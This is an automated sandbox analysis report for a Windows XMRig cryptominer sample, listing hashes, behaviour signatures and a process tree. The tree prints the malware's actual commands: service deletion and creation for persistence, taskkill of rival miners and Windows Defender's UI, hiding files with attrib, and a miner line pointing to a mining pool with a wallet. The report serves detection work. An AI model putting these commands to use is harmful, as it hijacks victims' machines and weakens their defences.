Analysis

  • max time kernel
    148s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-05-2024 10:26

General

  • Target

    5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

  • Size

    1.3MB

  • MD5

    5e960ba61a82c5340650e2ce975bb4c9

  • SHA1

    300aced1503b54d91e5508f0a210330e91b71b8a

  • SHA256

    1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3

  • SHA512

    9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1

  • SSDEEP

    24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\sc.exe
        sc delete Systemss
        3⤵
        • Launches sc.exe
        PID:2620
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIserver
        3⤵
        • Launches sc.exe
        PID:2532
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIservers
        3⤵
        • Launches sc.exe
        PID:2508
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMI
        3⤵
        • Launches sc.exe
        PID:2388
      • C:\Windows\SysWOW64\sc.exe
        sc delete Serv
        3⤵
        • Launches sc.exe
        PID:2784
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_update
        3⤵
        • Launches sc.exe
        PID:2700
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_updatea
        3⤵
        • Launches sc.exe
        PID:2416
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im spoolsvs.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im NsCpuapl.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im MSASCui.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nheqminer_zcash.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2040
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nssm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im update.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2440
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im server.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:356
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sppscv.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\Windows\SysWOW64\net.exe
        net stop wkde
        3⤵
        PID:1676
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop wkde
          4⤵
          PID:352
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 5 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:804
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im mscorsvw.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1452
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im WUDFHost.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1020
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im nheqminer.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:848
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im NsCpuCNMiner32.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1128
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im NsCpuCNMiner64.exe /f
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 5 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:2760
      • C:\Windows\SysWOW64\sc.exe
        sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
        3⤵
        • Launches sc.exe
        PID:2192
      • C:\Windows\SysWOW64\net.exe
        net start wkde
        3⤵
        PID:2180
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start wkde
          4⤵
          PID:1596
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
        3⤵
        • Sets file to hidden
        • Drops file in Windows directory
        • Views/modifies file attributes
        PID:584
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
        3⤵
        • Sets file to hidden
        • Drops file in Windows directory
        • Views/modifies file attributes
        PID:564
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
        3⤵
        • Sets file to hidden
        • Drops file in Windows directory
        • Views/modifies file attributes
        PID:2804
      • C:\Windows\SysWOW64\attrib.exe
        attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
        3⤵
        • Sets file to hidden
        • Drops file in Windows directory
        • Views/modifies file attributes
        PID:1404
  • C:\WINDOWS\Debug\wkde\mscorsvw.exe
    C:\WINDOWS\Debug\wkde\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Drops file in Windows directory
    PID:2164
    • C:\WINDOWS\Debug\wkde\svchost.exe
      C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:444

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\WINDOWS\Debug\wkde\mscorsvw.ini
    Filesize: 397B
    MD5: d298cd48c88433017ef4e66af740830e
    SHA1: e0ef455dc4df16948d85c5a058d0980ce5020822
    SHA256: b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
    SHA512: 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

  • C:\WINDOWS\Debug\wkde\mscorsvw.log
    Filesize: 244B
    MD5: df296d0aa6eb740c57059aa9f47fd46c
    SHA1: de668e0436d036c2608b3a16fbfaaf3cbfd52a59
    SHA256: 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a
    SHA512: db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5

  • C:\WINDOWS\Debug\wkde\svchost.exe
    Filesize: 687KB
    MD5: 79a1ec8d32e8e3032b5f5126c11f2216
    SHA1: 86dc55fcdc358a5c6699c41582b66b75bedc4086
    SHA256: d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
    SHA512: a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

  • C:\Windows\debug\wkde\mscorsvw.exe
    Filesize: 684KB
    MD5: cbb4ca806e69a4880dd02e04e5bce18b
    SHA1: 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
    SHA256: 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
    SHA512: 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

  • C:\Windows\debug\wkde\wk.bat
    Filesize: 884B
    MD5: 816d97b2dca2af96209ef913291d59be
    SHA1: a3c480a7e333a1623e7cd8194d68468397c3f6d1
    SHA256: ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
    SHA512: 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

  • memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp
    Filesize: 724KB

  • memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp
    Filesize: 1.4MB

  • memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp
    Filesize: 1.4MB

  • memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp
    Filesize: 1.4MB